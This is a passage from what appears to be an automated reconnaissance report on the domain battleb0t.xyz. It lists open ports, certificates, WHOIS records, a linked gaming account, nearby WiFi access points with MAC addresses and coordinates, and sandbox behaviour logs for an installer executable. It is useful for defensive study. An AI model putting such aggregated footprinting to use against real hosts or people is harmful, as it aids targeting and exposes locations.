names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1010', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1010', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" searching for class "#32770"\n "Tibiamapsinstaller.exe" searching for class "SysListView32"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" loaded module "ADVAPI32.DLL" at base 74f70000\n "Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 74a10000\n "Tibiamapsinstaller.exe" loaded module "SETUPAPI.DLL" at base 75190000\n "Tibiamapsinstaller.exe" loaded module "RPCRT4.DLL" at base 757a0000\n "Tibiamapsinstaller.exe" loaded module "SECUR32.DLL" at base 744d0000\n "Tibiamapsinstaller.exe" loaded module "SHELL32.DLL" at base 765b0000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL" at base 73b20000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL" at base 75d40000\n "Tibiamapsinstaller.exe" loaded module "WS2_32.DLL" at base 750a0000\n "Tibiamapsinstaller.exe" loaded module "WINHTTP.DLL" at base 733b0000\n "Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\MSWSOCK.DLL" at base 738e0000\n "Tibiamapsinstaller.exe" loaded module "%WINDIR%\\SYSTEM32\\WSHIP6.DLL" at base 73960000\n "Tibiamapsinstaller.exe" loaded module "IPHLPAPI.DLL" at base 74aa0000\n "Tibiamapsinstaller.exe" loaded module "CRYPT32.DLL" at base 76010000\n "Tibiamapsinstaller.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL" at base 73fe0000\n "Tibiamapsinstaller.exe" loaded module "DNSAPI.DLL" at base 73880000\n "Tibiamapsinstaller.exe" loaded module "DHCPCSVC6.DLL" at base 73400000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter OLEACCRC.DLL (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter Secur32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter WS2_32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter winhttp.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter IPHLPAPI.DLL (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter DNSAPI.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter dhcpcsvc.DLL (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter urlmon.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter CRYPTBASE.dll (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "LoadLibrary" with a parameter OLEAUT32.dll (UID: 00000000-00002964)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"0e000f00d87a4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "11001200387f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "11001200a47f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "12001300b87f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "12001300e07f4e73c4ee1800e8b14c73@ADVAPI32.dll"\n "1400150094934e73c4ee1800e8b14c73@ADVAPI32.dll"\n "0d000e0000804e73c4ee1800e8b14c73@SHELL32.dll"\n "0d000e0054804e73c4ee1800e8b14c73@SHELL32.dll"\n "0a000b003c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "0d000e002c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "0f0010001c1c6574b4f218002aab4b73@ADVAPI32.dll"\n "150016002c7a4e7344f41800e8b14c73@ADVAPI32.dll"\n "0e000f00a47a4e7344f41800e8b14c73@ADVAPI32.dll"\n "0e000f00d87a4e7344f41800e8b14c73@ADVAPI32.dll"\n "11001200387f4e7344f41800e8b14c73@ADVAPI32.dll"\n "11001200a47f4e7344f41800e8b14c73@ADVAPI32.dll"\n "12001300b87f4e7344f41800e8b14c73@ADVAPI32.dll"\n "12001300e07f4e7344f41800e8b14c73@ADVAPI32.dll"\n "1400150094934e7344f41800e8b14c73@ADVAPI32.dll"\n "25002600ac45977654fd8b00da386376@SETUPAPI.dll"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function address', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventWrite (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventRegister (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter EventUnregister (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter DrawThemeBackground (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetThemeBackgroundContentRect (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetThemePartSize (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter RegCloseKey (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter RegQueryValueExW (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter OpenThreadToken (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter OpenProcessToken (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter CheckTokenMembership (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetTokenInformation (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetUserNameExA (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002964)\n "Tibiamapsinstaller.exe" called "GetProcAddress" with a parameter GetSidSubAuthority (UID: 00000000 | 185.199.109.153 |
| 2023-05-12 02:53:52 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8003::153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zzzzz (Net ID: 00:01:24:F0:3B:50) | 37.7642, -122.3993 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9111 (Net ID: 00:14:C1:3F:EF:1F) | 40.2024, 29.0398 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 207.154.228.169 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Turkey | Domain Name: ACILACIKVETERINER.COM
Registry Domain ID: 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2023-04-01T13:07:55Z
Creation Date: 2021-11-02T23:11:03Z
Registry Expiry Date: 2023-11-02T23:11:03Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:11:50Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ACILACIKVETERINER.COM
Registry Domain ID : 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2023-04-01T12:50:32Z
Creation Date: 2021-11-02T23:11:03Z
Registrar Registration Expiration Date: 2023-11-02T23:11:03Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: Elazig
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=ACILACIKVETERINER.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:00Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 02:46:50 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515594BD (Net ID: 00:01:E3:55:94:BD) | 52.3759, 4.8975 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:62:55) | 52.3759, 4.8975 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.179): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) | 37.780462,-122.390564 |
| 2023-05-12 02:44:59 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.108.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.108.153 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.75 | 34.74.170.74 |
| 2023-05-12 03:01:31 | Web Server | No | Tool - WhatWeb | 0 | 1 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c581b373d7d806c-ORD"]} | 188.114.96.1 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Kongregate (Category: gaming)
https://www.kongregate.com/accounts/Battleb0t | Battleb0t |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | pics.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
|
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007hyno.github.io | 185.199.111.153 |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 6 | 0 | None | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| amcodev.me |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | fluid.battleb0t.xyz | [{"url": "https://fluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://fluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sanctuary_Mixer (Net ID: 00:18:F8:CB:D4:48) | 32.8608, -79.9746 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.132): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.196): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2083 | 172.67.168.252 |
| 2023-05-12 02:54:22 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | panel.battleb0t.xyz |
| 2023-05-12 02:59:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://62fde61cec16786f283c2ac4--stellular-hamster-c82590.netlify.app/data/scenario/title_screen.ks', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_ee8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "SmartScreen_AppRepSettings_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "CommunicationManager_Mutex"\n "IsoScope_ee8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ee8_IE_EarlyTabStart_0xbec_Mutex"\n "IsoScope_ee8_ConnHashTable<3816>_HashTable_Mutex"\n "SmartScreen_ClientId_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ee8_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3816"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_ee8_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex"'}, {u'category': 